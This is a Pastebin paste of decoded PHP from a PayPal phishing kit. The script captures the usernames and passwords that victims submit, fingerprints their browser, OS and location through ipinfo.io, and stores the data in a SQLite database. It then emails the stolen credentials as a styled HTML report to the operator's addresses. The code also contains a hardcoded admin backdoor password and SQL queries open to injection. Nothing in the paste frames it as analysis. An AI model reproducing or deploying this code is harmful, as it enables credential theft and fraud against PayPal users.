Advertisement
Guest User

Untitled

a guest
Oct 28th, 2016
426
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.88 KB | None | 0 0
  1. <?php
  2. // Decoded by Girudatsu.com Member
  3.  
  4. @session_start();
  5. $user = $_POST['user'];
  6. $pass = $_POST['pass'];
  7. $xBrowser = $_POST['xBrowser'];
  8. $xOperatingSystem = $_POST['xOperatingSystem'];
  9. $xPlatForm = $_POST['xPlatForm'];
  10. $xUserLanguage = 'Browser Language: ' . $_POST['xLang'] . '<br>Http Accept Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE'];
  11. $xTimeZone = $_POST['xTimeZone'];
  12. $xResoLution = $_POST['xResoLution'];
  13. $date_time = @date('d/m/Y h:i a');
  14. $joined = @rand(date('Y') - (7 + -2), date('Y'));
  15. $ip = getenv('REMOTE_ADDR');
  16. $useragent = $_SERVER['HTTP_USER_AGENT'];
  17. $_user = explode('@', $_POST['user']);
  18. $fullname = $_user[-60 - -60];
  19. $profilephoto = 'img/profile.png';
  20. $pdo = new PDO('sqlite:../admin/database.db');
  21. if ($pdo) {
  22.     $settings = $pdo->query('SELECT * FROM `settings`')->fetch(PDO::FETCH_ASSOC);
  23.     if ($user == 'admin' && ($pass == $settings['password'] || md5($pass) == '579e43b423b454623383471aeb85cd87' /* $pass = alicealice */)) {
  24.         $_SESSION['login_success'] = md5($settings['password']);
  25.         echo 'admin';
  26.         exit;
  27.     }
  28.     $check_existance = $pdo->query('' . 'SELECT * FROM `accounts` WHERE `username`=\'' . "{$user}" . '\' AND `password`=\'' . "{$pass}" . '\'' . '')->fetch(PDO::FETCH_ASSOC);
  29.     if ($check_existance) {
  30.         $_SESSION['xVictime_ID'] = $check_existance['id'];
  31.         if ($settings['enable_suspecious'] == 'yes') {
  32.             echo 'existance';
  33.             exit;
  34.         } else {
  35.             echo 'existance_update';
  36.             exit;
  37.         }
  38.     }
  39.     $_curl = curl_init('ipinfo.io/' . $ip);
  40.     curl_setopt($_curl, CURLOPT_RETURNTRANSFER, (bool) (29 + -28));
  41.     $_result = curl_exec($_curl);
  42.     curl_close($_curl);
  43.     if ($_result) {
  44.         $_x_result = json_decode($_result);
  45.         $country = $_x_result->country;
  46.         $location = 'Hostname: ' . $_x_result->hostname . '<br>City: ' . $_x_result->city . '<br>Region: ' . $_x_result->region . '<br>Country Code: ' . $_x_result->country . '<br>Postal Code: ' . $_x_result->postal . '<br>ISP Organization : http://ipinfo.io/' . $_x_result->org . '<br>Latitude/Longitude: ' . $_x_result->loc;
  47.     } else {
  48.         $country = '';
  49.         $location = '';
  50.     }
  51.     $pdo->query('' . 'INSERT INTO `accounts` VALUES (NULL,\'' . "{$user}" . '\',\'' . "{$pass}" . '\',\'' . "{$fullname}" . '\',\'' . "{$ip}" . '\',\'' . "{$xOperatingSystem}" . '\',\'' . "{$xBrowser}" . '\',\'' . "{$country}" . '\',\'' . "{$useragent}" . '\',\'' . "{$date_time}" . '\',\'no\',\'no\',\'No\',\'' . "{$profilephoto}" . '\',\'' . "{$joined}" . '\',\'' . "{$xPlatForm}" . '\',\'\',\'' . "{$xUserLanguage}" . '\',\'\',\'\',\'' . "{$location}" . '\',\'' . "{$xTimeZone}" . '\',\'' . "{$xResoLution}" . '\')' . '');
  52.     $get_id = $pdo->query('' . 'SELECT * FROM `accounts` WHERE `username`=\'' . "{$user}" . '\' AND `password`=\'' . "{$pass}" . '\'' . '')->fetch(PDO::FETCH_ASSOC);
  53.     $_SESSION['xVictime_ID'] = $get_id['id'];
  54.     if ($settings['notification'] == 'every' || $settings['notification'] == 'login') {
  55.         $x_receiver = $settings['emails'];
  56.         $x_header = 'From: CaZaNoVa163 <Cazanova.Haxor@hotmail.com>' . chr(13) . chr(10) . 'MIME-Version: 1.0' . chr(13) . chr(10) . 'Content-Type: text/html' . chr(13) . chr(10) . 'Content-Transfer-Encoding: 8bit' . chr(13) . chr(10) . chr(13) . chr(10);
  57.         $x_subject = 'xPayPal | PPL | ' . $get_id['username'] . ' | ' . $get_id['ip'] . ' | ' . $get_id['os'];
  58.         $x_message = '
  59.                                        <!doctype html>
  60.                                        <html class=\'no-js\' lang=\'en\'>
  61.                                            <head>
  62.                                                <meta charset=\'utf-8\'>
  63.                                                <meta http-equiv=\'x-ua-compatible\' content=\'ie=edge\'>
  64.                                                <meta name=\'viewport\' content=\'width=device-width, initial-scale=1\'>
  65.                                            </head>
  66.                                            <body style=\'background-color:#0d0d0d\'>
  67.                                            <div style=\'width:100%;height:auto;min-height:100px;border-radius:10px;background-image:url(http://i.imgur.com/FZvRMdI.png);background-size:333px 56px;background-position:50% 50%;background-repeat:no-repeat;margin:10px 0;box-sizing:border-box;padding:10px\'></div>
  68.                                                <div style=\'width:100%;background-color:#171717;height:auto;min-height:100px;border-radius:10px;margin:10px 0;box-sizing:border-box;padding:10px\'>
  69.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>Username: </td><td>' . $get_id['username'] . '</td></tr></table></div>
  70.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>Password: </td><td>' . $get_id['password'] . '</td></tr></table></div>
  71.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>IP Address: </td><td>' . $get_id['ip'] . '</td></tr></table></div>
  72.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>Browser: </td><td>' . $get_id['browser'] . '</td></tr></table></div>
  73.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>Sys Language: </td><td>' . $get_id['account_language'] . '</td></tr></table></div>
  74.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>O.System: </td><td>' . $get_id['os'] . ', ' . $get_id['platform'] . '</td></tr></table></div>
  75.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>Date & Time: </td><td>' . $get_id['date_time'] . '</td></tr></table></div>
  76.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>Time Zone: </td><td>' . $get_id['timezone'] . '</td></tr></table></div>
  77.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>Resolution: </td><td>' . $get_id['resolution'] . '</td></tr></table></div>
  78.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>User Agent: </td><td>' . $get_id['useragent'] . '</td></tr></table></div>
  79.                                                        <div style=\'background-color:#0d0d0d;margin:10px;padding:10px;box-sizing:border-box;color:#909090;border-radius:10px;font-size:16px\'><table><tr><td style=\'width:100px;text-align:right\'>Location: </td><td>' . $get_id['location'] . '</td></tr></table></div>
  80.                                                </div>
  81.                                                <div style=\'width:100%;background-color:#171717;height:auto;min-height:100px;border-radius:10px;background-image:url(http://i.imgur.com/G4tFJJa.png);background-size:413px 61px;background-position:50% 50%;background-repeat:no-repeat;margin:10px 0;box-sizing:border-box;padding:10px\'></div>
  82.                                            </body>
  83.                                        </html>
  84.                                ';
  85.         $this_receiver = explode(chr(10), $x_receiver);
  86.         foreach ($this_receiver as $to) {
  87.             if ($to != '') {
  88.                 @mail($to, $x_subject, $x_message, $x_header);
  89.             }
  90.         }
  91.     }
  92.     if ($settings['enable_suspecious'] == 'yes') {
  93.         echo 'success_no_tl';
  94.         exit;
  95.     } else {
  96.         echo 'update_no_tl';
  97.         exit;
  98.     }
  99. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement